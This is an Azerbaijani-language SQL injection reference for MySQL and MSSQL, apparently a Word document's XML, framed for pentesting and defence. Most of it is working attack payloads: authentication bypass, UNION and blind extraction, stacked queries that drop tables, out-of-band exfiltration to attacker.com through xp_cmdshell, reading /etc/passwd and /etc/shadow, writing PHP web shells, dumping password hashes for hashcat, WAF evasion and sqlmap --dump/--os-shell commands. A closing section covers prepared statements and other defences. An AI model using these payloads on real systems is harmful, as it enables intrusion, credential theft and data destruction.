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20"/>
              <w:left w:val="single" w:color="1a3a5c" w:sz="20"/>
              <w:bottom w:val="single" w:color="1a3a5c" w:sz="20"/>
              <w:right w:val="single" w:color="1a3a5c" w:sz="2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56"/>
                <w:szCs w:val="56"/>
              </w:rPr>
              <w:t xml:space="preserve">🛡 SQL INJECTION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Tam Texniki Referans Sənədi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A0C4FF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">MySQL  •  MSSQL  •  20 Bölmə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Hazırlayan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Məqsəd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Injection Tədqiqat Sənədi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Müdafiə və Pentesting üçün Referans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 SQL Injection Nədir?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SQL Injection (SQLi) — istifadəçi girişi vasitəsilə verilənlər bazasına ixtiyari SQL əmrləri yeridilməsi hücumudur. Bu, OWASP Top 10-un daimi üzvü olan ən kritik veb tətbiq zəifliklərindən biridir.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C2626" w:sz="24"/>
              <w:bottom w:val="none"/>
              <w:right w:val="none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 XƏBƏRDARLIQ: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 Injection yalnız test icazəsi olan sistemlərə qarşı tətbiq edilməlidir. İcazəsiz istifadə qanunsuzdur.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Hücumun Anatomiyası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Əsas Prinsip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Normal sorğu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users WHERE username='admin' AND password='1234';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SQLi yeridilmiş sorğu (şifrə olmadan giriş)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users WHERE username='admin'--' AND password='anything';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Nəticə: şifrə yoxlanışı şərh kimi keçirilir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20"/>
        <w:gridCol w:w="2520"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="312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Hücum Növü</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="372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Açıqlama</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="252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Səviyyəsi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In-band SQLi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Nəticə birbaşa cavabda görünür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🔴 Kritik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Blind SQLi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Cavabdan nəticə çıxarılır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🟠 Yüksək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Out-of-band SQLi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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DNS/HTTP ilə data sızdırılır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Orta-Yüksək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Error-based</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Xəta mesajından data oxunur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🔴 Kritik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Time-based</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Gecikməyə görə qiymətləndirilir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🟠 Yüksək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 Əsas Sintaksis və Test Payloadları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Universal Test Payloadları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Klassik Payloadlar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'1'='1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1=1--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'; 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'x'='x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1; SELECT 1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admin'--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''='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MSSQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="39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Məqsəd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OR 1=1--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 bypass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OR 1=1#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✘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MySQL şərh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OR 1=1/*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Blok şərh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'; EXEC xp_cmdshell('cmd')--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✘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OS əmri (MSSQL)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AND SLEEP(5)--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✘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MySQL time-based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'; WAITFOR DELAY '0:0:5'--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✘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✔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MSSQL time-based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Şərh Sintaksisi Fərqləri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Şərh Operatorları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şərh operatorları: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       --&gt; sətir şərhi (MySQL xüsusi)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        --&gt; sətir şərhi (boşluq lazımdır: "-- ")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/* ... */  --&gt; blok şərh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 şərh operatorları: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        --&gt; sətir şərhi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/* ... */  --&gt; blok şərh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NOT: MSSQL # işarəsini tanımır!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 UNION Based Injection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UNION əmri iki SELECT sorğusunun nəticəsini birləşdirir. SQLi-də mövcud sorğuya əlavə sorğu əlavə etmək üçün istifadə olunur.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Şərt: Sütun sayı uyğun olmalıdır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MySQL/MSSQL Universal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Addım 1: Sütun sayını tapın (ORDER BY ilə)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ORDER BY 1--   --&gt; xəta yoxdursa, 1 sütun var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ORDER BY 2--   --&gt; xəta yoxdursa, 2 sütun var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ORDER BY 3--   --&gt; xəta varsa, 2 sütun var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Addım 2: Hansı sütunların string tutduğunu tapın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NULL, NULL--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'a', NULL--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NULL, 'a'--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Addım 3: Məlumat çıxarın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username, password FROM users--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Verilənlər Bazası Haqqında Məlumat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DB Məlumatı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version(), user()--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database(), schema_name FROM information_schema.schemata--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@@version, @@servername--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db_name(), system_user--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 Information Schema Kəşfi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Cədvəl Adlarını Tapın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Cədvəl Kəşfi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table_name, NULL FROM information_schema.tables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table_schema=database()--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table_name, NULL FROM information_schema.tables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table_catalog=db_name()--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 (sys cədvəlləri)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name, NULL FROM sysobjects WHERE xtype='U'--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Sütun Adlarını Tapın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Sütun Kəşfi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column_name, data_type FROM information_schema.columns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table_name='users'--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column_name, data_type FROM information_schema.columns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table_name='users'--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 (sys.columns)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c.name, t.name FROM sys.columns c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JOIN sys.types t ON c.user_type_id=t.user_type_id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object_id=object_id('users')--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ℹ QEYD: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information_schema MySQL, MSSQL, PostgreSQL-də mövcuddur. Oracle-da USER_TABLES istifadə edin.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 Boolean-Based Blind Injection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Tətbiq birbaşa sorğu nəticəsini göstərmir, lakin TRUE/FALSE cavablarına görə fərqli davranır. Məsələn: "istifadəçi tapıldı" vs "tapılmadı".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Klassik Boolean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Boolean Metodoloji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Şərt doğrudursa tətbiq fərqli cavab verir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1=1--     --&gt; TRUE  (normal cavab)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1=2--     --&gt; FALSE (boş/xətalı cavab)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MySQL: database adının 1. hərfini tapın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SUBSTRING(database(),1,1)='a'--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SUBSTRING(database(),1,1)='b'--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ASCII(SUBSTRING(database(),1,1))&gt;77--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 ekvivalenti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SUBSTRING(db_name(),1,1)='a'--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ASCII(SUBSTRING(db_name(),1,1))&gt;77--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Avtomatlaşdırılmış Proses Məntiqi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Binary Search Optimallaşdırması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Binary search ilə ASCII dəyər tapmaq (daha sürətli)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ASCII(SUBSTRING(database(),1,1)) BETWEEN 65 AND 90--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ASCII(SUBSTRING(database(),1,1)) BETWEEN 65 AND 77--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ASCII(SUBSTRING(database(),1,1)) BETWEEN 78 AND 90--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Bu şəkildə 7-8 sorğuda bir hərf tapılır (ASCII: 0-127)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 Time-Based Blind Injection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Tətbiq heç bir fərqli cavab vermir. Lakin verilənlər bazasını süni gecikmə yaratmağa məcbur edərək TRUE/FALSE müəyyənləşdirilir.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Gecikmə Əmrləri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Time-Based Payloadlar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MySQL: SLEEP(saniyə)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SLEEP(5)--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IF(1=1, SLEEP(5), 0)--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IF(ASCII(SUBSTRING(database(),1,1))&gt;77, SLEEP(5), 0)--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MSSQL: WAITFOR DELAY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WAITFOR DELAY '0:0:5'--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IF (1=1) WAITFOR DELAY '0:0:5'--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IF (ASCII(SUBSTRING(db_name(),1,1))&gt;77) WAITFOR DELAY '0:0:5'--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MySQL: BENCHMARK (alternativ)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BENCHMARK(10000000, MD5('a'))--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24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TİP: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Şəbəkə gecikmələri nəticəni təhrif edə bilər. Hər testin cavab süresini ölçün, mütləq vaxt deyil.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 Error-Based Injection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Verilənlər bazasının xəta mesajlarından birbaşa məlumat sızdırılır. Bu üsul çox sürətlidir çünki bir sorğuda çox data çıxarmaq mümkündür.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MySQL Error-Based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ExtractValue ilə XPath xətası yaratmaq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EXTRACTVALUE(1,CONCAT(0x7e,database()))--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EXTRACTVALUE(1,CONCAT(0x7e,(SELECT table_name FROM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information_schema.tables LIMIT 1)))--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UpdateXML alternativ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UPDATEXML(1,CONCAT(0x7e,(SELECT user())),1)--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Floor + Rand xətası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1,COUNT(*),CONCAT((SELECT database()),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FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x--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MSSQL Error-Based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Convert tipi xətası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CONVERT(int,(SELECT TOP 1 table_name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FROM information_schema.tables))--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Cast tipi xətası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AND CAST((SELECT @@version) AS int)--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Xəta mesajı nümunəsi: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Conversion failed when converting the nvarchar value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'Microsoft SQL Server 2019...' to data type int.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8. Stacked Queries (Çoxlu Sorğu)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Nöqtəli vergül (;) ilə bir neçə SQL əmri ardıcıl icra etmək. MSSQL-də tam dəstəklənir. MySQL-in PHP PDO kontekstində işləyir.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MSSQL Stacked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İki sorğu ardıcıl icra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SELECT * FROM users--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INSERT INTO users VALUES('hacker','pass')--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DROP TABLE logs--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Variabla ilə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DECLARE @v VARCHAR(100); SET @v=(SELECT TOP 1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table_name FROM information_schema.tables);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EXEC('SELECT ' + @v)--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MySQL Stacked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multi-query yalnız müəyyən drayverlərdə işləyir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SELECT * FROM users;--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stored procedure yaratmaq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CREATE PROCEDURE p() BEGIN SELECT * FROM users; END;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CALL p();--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24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TİP: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PDO::MYSQL_ATTR_MULTI_STATEMENTS=false parametri stacked queries-i bloklayır. Bu qoruma tədbirini həmişə aktivləşdirin.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9. Out-of-Band (OOB) Injection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Nəticəni DNS sorğusu, HTTP sorğusu və ya fayl sistemi vasitəsilə xarici serverə göndərmək. Şəbəkə filtrləri olmayan mühitlərdə effektivdir.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MSSQL: DNS ilə Data Sızdırma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 OOB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xp_cmdshell vasitəsilə DNS sorğusu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EXEC master..xp_cmdshell 'nslookup ' +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(SELECT TOP 1 table_name FROM information_schema.tables)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+ '.attacker.com'--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UNC path ilə (SMB)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EXEC master..xp_cmdshell 'dir \\' +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(SELECT TOP 1 password FROM users WHERE username=''admin'')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+ '.attacker.com\share'--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MySQL: Load File / Outfile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 OOB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Faylı oxumaq (FILE imtiyazı lazımdır)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LOAD_FILE('/etc/passwd'), NULL--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Faylı yazmaq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'&lt;?php system($_GET["cmd"])?&gt;', NULL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INTO OUTFILE '/var/www/html/shell.php'--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DNS istəyi (UDF qurulu olmalıdır)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sys_eval('nslookup $(hostname).attacker.com'), NULL--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10. Autentifikasiya Bypass Texnikləri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Klassik Login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Login Form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Username sahəsinə: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admin'--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admin'/*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1=1--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'1'='1'--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admin' #     (MySQL)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Username + Password sahəsinə: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1=1-- (username)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anything    (password - artıq yoxlanmır)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Admin olmayan hesab ilə admin kimi giriş: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1,'admin','hash'--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Xüsusi Bypass Ssenariləri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348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Payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="348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MSSQL Payload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Şifrəni keç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OR 1=1--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OR 1=1--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kimi giriş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admin'--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admin'--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Hash manipulyasiyası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OR password LIKE '%'--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' OR password LIKE '%'--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Second-order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admin'-- (qeyd zamanı)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admin'-- (qeyd zamanı)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Null byte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admin%00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N/A (SQL Server-də işləmir)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24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TİP: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Prepared Statements (Parametrli Sorğular) bütün bu bypass texniklərini tam bloklayır.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11. MySQL Xüsusi Funksiyalar və Atributlar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Sistem Məlumatı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 Sistem Dəyişənləri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İstifadəçi və DB məlumatı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user();              -- cari DB istifadəçisi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current_user();      -- autentifikasiya edilmiş istifadəçi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database();          -- cari DB adı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version();           -- MySQL versiyası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@@hostname;          -- server adı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@@datadir;           -- data qovluğu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@@global.secure_file_priv; -- fayl oxuma icazəsi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String Manipulyasiya Funksiyaları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 String Funksiyaları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CONCAT(a, b)                 -- birləşdirmə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CONCAT_WS(",", a, b, c)     -- ayırıcı ilə birləşdirmə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SUBSTRING(str, start, len)  -- alt string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SUBSTR(str, pos)            -- qısaldılmış forma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MID(str, pos, len)          -- eyni SUBSTRING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ASCII(char)                  -- ASCII kodu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CHAR(65)                     -- ASCII-dən hərfə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HEX(str)                     -- hex kodlama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UNHEX(hex)                   -- hex açma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LENGTH(str)                  -- uzunluq (byte)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CHAR_LENGTH(str)             -- uzunluq (simvol)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LOWER(str) / UPPER(str)     -- böyük/kiçik hərf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REPLACE(str,from,to)         -- əvəzetmə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GROUP_CONCAT(col)            -- sütunu birləşdir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12. MSSQL Xüsusi Funksiyalar və Atributlar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Sistem Məlumatı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 Sistem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Sistem dəyişənləri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@@version;           -- SQL Server versiyası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@@servername;        -- server adı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@@language;          -- dil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@@spid;              -- session ID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db_name();           -- cari DB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user_name();         -- cari istifadəçi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system_user;         -- Windows/SQL login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host_name();         -- istemci adı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APP_NAME();          -- uygulama adı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String Funksiyaları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 String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 string əmrləri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CONCAT(a, b)                 -- SQL Server 2012+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 + b                        -- klassik birləşdirmə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SUBSTRING(str, start, len)  -- alt string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ASCII(char)                  -- ASCII kodu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CHAR(65)                     -- hərfə çevir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LEN(str)                     -- uzunluq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UPPER(str) / LOWER(str)     -- hərf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REPLACE(str, from, to)      -- əvəzetmə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CHARINDEX(sub, str)         -- axtarma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STUFF(str, pos, len, new)   -- daxil et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CONVERT(VARCHAR, num)        -- tip çevirmə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CAST(expr AS VARCHAR)        -- tip çevirmə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STRING_AGG(col, ',')        -- SQL Server 2017+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13. Filtrləri Keçmək (Filter Bypass)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WAF (Web Application Firewall) və giriş filtrləri çox vaxt adi payloadları bloklayır. Aşağıdakı texniklərlə bu bloklama keçilə bilər.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Case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Böyük/Kiçik Hərf Qarışığı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* fRoM uSeRs wHeRe Id=1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UNION ALL SELECT ...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uNiOn SeLeCt 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Whitespace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Boşluq Əvəzediciləri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SELECT/**/username/**/FROM/**/users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SELECT%09username%09FROM%09users    -- tab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SELECT%0Ausername%0AFROM%0Ausers    -- newline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SELECT%0D%0Ausername FROM users     -- CRLF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Keyword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Filtr Bypass Texnikləri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İkiqat URL kodlama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UNION  --&gt;  %55NION  --&gt;  %2555NION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Şərh daxiletmə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UN/**/ION SE/**/LECT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UN%00ION SEL%00ECT  -- Null byte (bəzi parserlər)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Ekvivalent ifadələr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OR 1=1--   --&gt;   ' OR 'unusual'='unusual'--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SLEEP(5)     --&gt;   BENCHMARK(5000000,SHA1(1))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ASCII()      --&gt;   ORD()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SUBSTRING()  --&gt;   SUBSTR() / MID()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AND          --&gt;   &amp;&amp;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OR           --&gt;   ||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14. Fayl Oxuma/Yazma Əməliyyatları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MySQL Fayl Əməliyyatları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FILE imtiyazı tələb olunur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@@global.secure_file_priv = '' olmalıdır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Fayl oxumaq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LOAD_FILE('/etc/passwd'), NULL--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LOAD_FILE('/etc/shadow'), NULL--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LOAD_FILE('/var/www/html/config.php'), NULL--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Fayl yazmaq (web shell)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INTO OUTFILE '/var/www/html/shell.php'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LINES TERMINATED BY 0x3c3f7068702073797374656d28245f4745545b22636d64225d293b3f3e--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DUMPFILE (binary)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INTO DUMPFILE '/tmp/udf.so'--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MSSQL xp_cmdshell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 xp_cmdshell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xp_cmdshell aktiv etmək (sa imtiyazı lazımdır)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EXEC sp_configure 'show advanced options', 1;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RECONFIGURE;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EXEC sp_configure 'xp_cmdshell', 1;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RECONFIGURE;--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Fayl oxumaq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EXEC xp_cmdshell 'type C:\inetpub\wwwroot\web.config'--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Web shell yazmaq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'; EXEC xp_cmdshell 'echo ^&lt;?php system($_GET["c"]);?^&gt; &gt;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C:\inetpub\wwwroot\shell.php'--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15. Saxlanılan Prosedurlar və Sistem Cədvəlləri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MSSQL Sistem Stored Procedure-ları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60"/>
        <w:gridCol w:w="2500"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Prosedur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="38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Funkisya</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="25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Təhlükə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xp_cmdshell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OS əmrləri icra edir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🔴 Kritik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xp_regread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Registry oxuyur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🔴 Kritik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xp_servicecontrol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Servisləri idarə edir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🔴 Kritik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sp_configure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Server konfiqurasiyası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🟠 Yüksək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sp_executesql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Dinamik SQL icra edir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🟠 Yüksək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sp_makewebtask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Fayl yaratmaq (köhnə)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Orta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xp_dirtree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Qovluq siyahısı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Orta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xp_fileexist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Fayl mövcudluğu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Orta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MSSQL Sistem Cədvəlləri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 Sistem Sorğuları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Bütün istifadəçi cədvəlləri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name FROM sysobjects WHERE xtype='U'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Bütün sütunlar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c.name, t.name FROM sys.columns c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JOIN sys.types t ON c.user_type_id = t.user_type_id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Bütün istifadəçilər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name, type_desc FROM sys.server_principals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type IN ('S','U')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Linked serverlər (lateral hərəkət)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SELECT name, data_source FROM sys.servers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16. İkinci Dərəcəli (Second-Order) Injection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Payload əvvəlcə verilənlər bazasına saxlanılır, sonra başqa bir sorğuda istifadə edildiyi zaman aktivləşir. Adi statik analiz alətləri bunu çox vaxt aşkarlamır.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Ssenari: Qeydiyyat → Profil Yeniləmə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Second-Order Mexanizmi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-- 1. Addım: Qeydiyyat forması (saxlanılır, icra edilmir)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Username: admin'--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Password: anything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-- 2. Addım: Profil yeniləmə backend kodu (həssas):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UPDATE users SET password='newpass'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username='' + stored_username + "'"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-- 3. Nəticə: icra edilən sorğu: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UPDATE users SET password='newpass' WHERE username='admin'--'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Yəni: admin istifadəçisinin şifrəsi dəyişdirilir!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ℹ QEYD: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Second-order injection-u aşkar etmək üçün: hər DB yazma nöqtəsini izləyin, sonra o datanın SQL-də istifadə edildiyi yeri tapın.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17. Şifrə Hashlarının Əldə Edilməsi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MySQL: mysql.user Cədvəli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MySQL Hash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5.x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user, password FROM mysql.user--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8.x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user, authentication_string FROM mysql.user--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Cari istifadəçi şifrə hashı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user(), password FROM mysql.user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WHERE user=user()--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MSSQL: sys.sql_logins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MSSQL Hash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 login hashları (sysadmin lazımdır)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name, password_hash FROM sys.sql_logins--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Köhnə format (SQL Server 2000)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' UNION SELECT name, password FROM sysxlogins--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Hash formatları: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5.x: *XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX (SHA1)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8.x: $A$005$... (caching_sha2_password)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MSSQL:     0x0200XXXXXXXX... (SHA512)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312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 Alqoritmi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="39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Cracking Aləti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MySQL 5.x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SHA1 (*hash)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hashcat -m 300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MySQL 8.x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SHA256 ($A$)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hashcat -m 7401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MSSQL 2012+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SHA512 (0x0200)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hashcat -m 1731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MSSQL 2000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SHA1 (0x0100)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hashcat -m 131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18. Avtomatlaşdırma: SQLMap İstifadəsi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SQLMap — açıq mənbəli avtomatik SQL injection aşkarlama və istismar alətidir.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Əsas SQLMap Əmrləri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SQLMap Əmrləri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Əsas skan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"https://target.com/page?id=1"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POST forması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"https://target.com/login" --data="user=a&amp;pass=b"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Cookie ilə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"https://target.com/page" --cookie="session=abc"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Header ilə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"https://target.com/" -H "X-Forwarded-For: *"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DB adlarını listele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"https://target.com/?id=1" --dbs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Cədvəlləri listele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"https://target.com/?id=1" -D mydb --tables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Datanı dump et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"https://target.com/?id=1" -D mydb -T users --dump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OS shell (xp_cmdshell varsa)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"https://target.com/?id=1" --os-shell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WAF bypass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sqlmap -u "https://target.com/?id=1" --tamper=space2comment,randomcase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19. Müdafiə Tədbirləri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 Prepared Statements (Parametrli Sorğular) — Ən Effektiv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Prepared Statements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PHP PDO nümunəsi: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$stmt = $pdo-&gt;prepare("SELECT * FROM users WHERE username=? AND password=?");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$stmt-&gt;execute([$username, $password]);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Java PreparedStatement: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PreparedStatement stmt = conn.prepareStatement(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"SELECT * FROM users WHERE id=?");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stmt-&gt;setInt(1, userId);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Python (parameterized):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cursor.execute("SELECT * FROM users WHERE id=%s", (user_id,))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 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AA" w:sz="6"/>
              <w:left w:val="single" w:color="4444AA" w:sz="6"/>
              <w:bottom w:val="single" w:color="4444AA" w:sz="6"/>
              <w:right w:val="single" w:color="4444AA" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:fill="2D2D4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6"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">▸ Stored Procedures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-- MySQL Stored Procedure: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CREATE PROCEDURE GetUser(IN p_id INT)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  SELECT * FROM users WHERE id = p_id;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4444AA" w:sz="16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CALL GetUser(1);  -- parametr birbaşa SQL-ə yerleşmir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Müdafiə</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="21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Effektivlik</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="42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Açıqlama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Prepared Statements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🟢 Tam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 + data ayrılır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Stored Procedures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🟢 Yüksək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DB tərəfindən parametrli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Qismən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Ağ siyahı üsulu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Escaping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Qismən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Kontekstə görə dəyişir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WAF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Qismən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Bypass edilə bilər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Least Privilege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🟢 Dərinlik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Ziyanı məhdudlaşdırır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🟡 Qismən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Məlumat sızdırmır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20. Sürətli Referans: MySQL vs MSSQL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Əməliyyat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="308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</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="308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MSSQL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Versiya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version()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@@version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Cari DB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database()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db_name()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Cari İstifadəçi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user()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system_user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Server Adı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@@hostname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SELECT @@servername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Cədvəllər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information_schema.tables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information_schema.tables / sysobjects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Sütunlar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information_schema.columns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information_schema.columns / sys.columns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Şərhq (sətir)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 (boşluqla) / #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Şərh (blok)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/* ... */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/* ... */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 Birləşmə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CONCAT(a,b) / 'a' 'b'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 + b / CONCAT (2012+)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Substring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SUBSTRING/MID/SUBSTR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SUBSTRING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Gecikmə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SLEEP(n)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WAITFOR DELAY '0:0:n'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Şərtli İcra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IF(cond, a, b)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 ... ELSE / CASE WHEN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Limit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LIMIT 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TOP n / OFFSET FETCH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Fayl Oxu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LOAD_FILE(path)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xp_cmdshell 'type file'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Fayl Yaz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INTO OUTFILE / DUMPFILE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xp_cmdshell 'echo &gt; file'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OS Əmri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sys_exec() (UDF)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xp_cmdshell 'cmd'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Hex Kodlama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0x41 / HEX('a')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0x41 / CONVERT(VARBINARY...)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Null Birləşmə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IFNULL(a, b)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ISNULL(a, b) / COALESCE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Xəta-əsaslı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EXTRACTVALUE / UPDATEXML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CONVERT(int, ...) / CAST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Sənəd Cədvəli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information_schema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sys.* / INFORMATION_SCHEMA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6"/>
              <w:left w:val="single" w:color="1a3a5c" w:sz="16"/>
              <w:bottom w:val="single" w:color="1a3a5c" w:sz="16"/>
              <w:right w:val="single" w:color="1a3a5c" w:sz="16"/>
            </w:tcBorders>
            <w:shd w:fill="1a3a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⚠ ETİK XƏBƏRDARLIQ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 sənəddəki bütün texnikalar yalnız icazəli pentesting, CTF və laboratoriya mühitlərində istifadə edilməlidir.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İcazəsiz sistemlərə hücum qanunsuzdur.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2026-03-05T10:32:54.470Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-05T10:32:54.471Z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